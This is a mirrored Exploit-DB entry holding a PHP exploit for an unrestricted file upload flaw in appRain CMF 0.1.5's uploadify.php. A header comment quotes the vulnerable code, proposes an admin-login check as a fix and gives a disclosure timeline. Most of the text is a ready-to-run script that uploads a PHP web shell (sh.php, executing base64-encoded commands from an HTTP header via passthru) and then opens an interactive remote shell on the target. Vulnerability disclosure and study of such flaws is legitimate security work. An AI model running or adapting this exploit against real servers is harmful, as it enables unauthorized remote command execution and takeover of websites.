appRain CMF 0.1.5 – ‘Uploadify.php’ Unrestricted Arbitrary File Upload

  • 作者: EgiX
    日期: 2012-01-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18392/
  • <?php
    
    /*
    ---------------------------------------------------------------------
    appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit
    ---------------------------------------------------------------------
    
    author............: Egidio Romano aka EgiX
    mail..............: n0b0d13s[at]gmail[dot]com
    software link.....: http://www.apprain.com/
     
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.|
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
    
    [-] vulnerable code in /webroot/addons/uploadify/uploadify.php
    
    27.if (!empty($_FILES)) {
    28.$tempFile = $_FILES['Filedata']['tmp_name'];
    29.//$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
    30.$targetFile ="uploads/" . $_FILES['Filedata']['name'];
    31.
    32.// $fileTypes= str_replace('*.','',$_REQUEST['fileext']);
    33.// $fileTypes= str_replace(';','|',$fileTypes);
    34.// $typesArray = split('\|',$fileTypes);
    35.// $fileParts= pathinfo($_FILES['Filedata']['name']);
    36.
    37.// if (in_array($fileParts['extension'],$typesArray)) {
    38.// Uncomment the following line if you want to make the directory if it doesn't exist
    39.// mkdir(str_replace('//','/',$targetPath), 0755, true);
    40.
    41.move_uploaded_file($tempFile,$targetFile);
    42.echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);
    43.// } else {
    44.//echo 'Invalid file type.';
    45.// }
    46.}
    
    Restricted access tothis script isn't properly realized,so an attacker mightbe able to upload
    arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked.
    
    [-] Possible bug fix:
    
    include_once('../../../app.php');
    App::__Obj('appRain_Base_Core')->check_admin_login(); 
    
    add this lines of code at the beginning of the script
    
    [-] Disclosure timeline:
    
    [19/12/2011] - Vulnerability discovered
    [19/12/2011] - Issue reported to http://www.apprain.com/ticket/1135
    [20/12/2011] - Vendor response and fix suggested 
    [16/01/2012] - After four weeks still no fix released
    [19/01/2012] - Public disclosure
    
    */
    
    error_reporting(0);
    set_time_limit(0);
    ini_set("default_socket_timeout", 5);
    
    function http_send($host, $packet)
    {
    if (!($sock = fsockopen($host, 80)))
    die("\n[-] No response from {$host}:80\n");
     
    fputs($sock, $packet);
    return stream_get_contents($sock);
    }
    
    print "\n+---------------------------------------------------------------+";
    print "\n| appRain CMF <= 0.1.5 Unrestricted File Upload Exploit by EgiX |";
    print "\n+---------------------------------------------------------------+\n";
     
    if ($argc < 3)
    {
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /apprain-v015/\n";
    die();
    }
    
    $host = $argv[1];
    $path = $argv[2];
    
    $payload= "--o0oOo0o\r\n";
    $payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"sh.php\"\r\n\r\n";
    $payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
    $payload .= "--o0oOo0o--\r\n";
    
    $packet= "POST {$path}addons/uploadify/uploadify.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
    $packet .= "Connection: close\r\n\r\n{$payload}";
    
    if (!preg_match('/sh.php/', http_send($host, $packet))) die("\n[-] Upload failed!\n");
    
    $packet= "GET {$path}addons/uploadify/uploads/sh.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cmd: %s\r\n";
    $packet .= "Connection: close\r\n\r\n";
    
    while(1)
    {
    print "\napprain-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
    }
    
    ?>